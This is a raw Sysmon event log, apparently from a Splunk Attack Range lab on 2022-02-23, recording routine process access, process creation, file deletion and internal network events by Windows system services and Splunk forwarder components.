10:33:19.767{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.767{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.767{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0D6F-6216-8A04-000000003802}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.767{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D6F-6216-8A04-000000003802}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.768{C8EA50B7-0D6F-6216-8A04-000000003802}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.636{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CBCEC9E1137D0431707F05733E02569,SHA256=DEC0E2B4F16C34589EC134F8EBC92D7D47BA185F9BA9C6A8061CC34B39DB2463,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:19.660{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE56F0E781244C2168D19EB58D76C4E1,SHA256=1E0A3612274DE2712B34B37EC7255F67D30DCD55A65A3ECE770AB035E6BCBA96,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:16.643{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51133-false10.0.1.12-8000- 23542300x8000000000000000213612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:20.754{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2371C8D1A6F7F1CCE7D917ED01C83180,SHA256=EA43DDCCB87CD9CE9C749B85062D40E8851A2FA85E42A3EAC9BBD5A57C50FEA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.941{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D70-6216-8C04-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.941{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0D70-6216-8C04-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.941{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D70-6216-8C04-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.941{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.941{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.941{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.941{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.942{C8EA50B7-0D70-6216-8C04-000000003802}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.771{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2698DAEE11FFC3B336CFBF007E1B0F12,SHA256=29FB3EDD8F25E2CD74896D411399A2F4F880D0A1E4CF9F2E2E3B4E12FF599C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.771{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=586A8706309D2CF112F31AF4D58EFF3B,SHA256=EC9EDB3ED26A2EC95234409C40C6247EB60340836479BBABB8AC0B76BDF64094,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.640{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=760D694830ECAFE1ABC2A4602D1DEC24,SHA256=4E8E1950F33A0A15207318C8B66811E08FFBECA35B89DE0052478D29FEF8AB1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.592{C8EA50B7-0D70-6216-8B04-000000003802}52405620C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.273{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D70-6216-8B04-000000003802}5240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.273{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.273{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.273{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.273{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.273{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0D70-6216-8B04-000000003802}5240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.273{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D70-6216-8B04-000000003802}5240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.274{C8EA50B7-0D70-6216-8B04-000000003802}5240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000284441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:20.028{C8EA50B7-0D6F-6216-8A04-000000003802}44961960C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:21.770{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5AADD944D4AAB32DF6FFE4D64EC7898,SHA256=29DDFAA43B0E6C916DE7366B64B1A5FABFFB5EA0396232B0614D0135C10DC88B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:21.962{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2698DAEE11FFC3B336CFBF007E1B0F12,SHA256=29FB3EDD8F25E2CD74896D411399A2F4F880D0A1E4CF9F2E2E3B4E12FF599C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 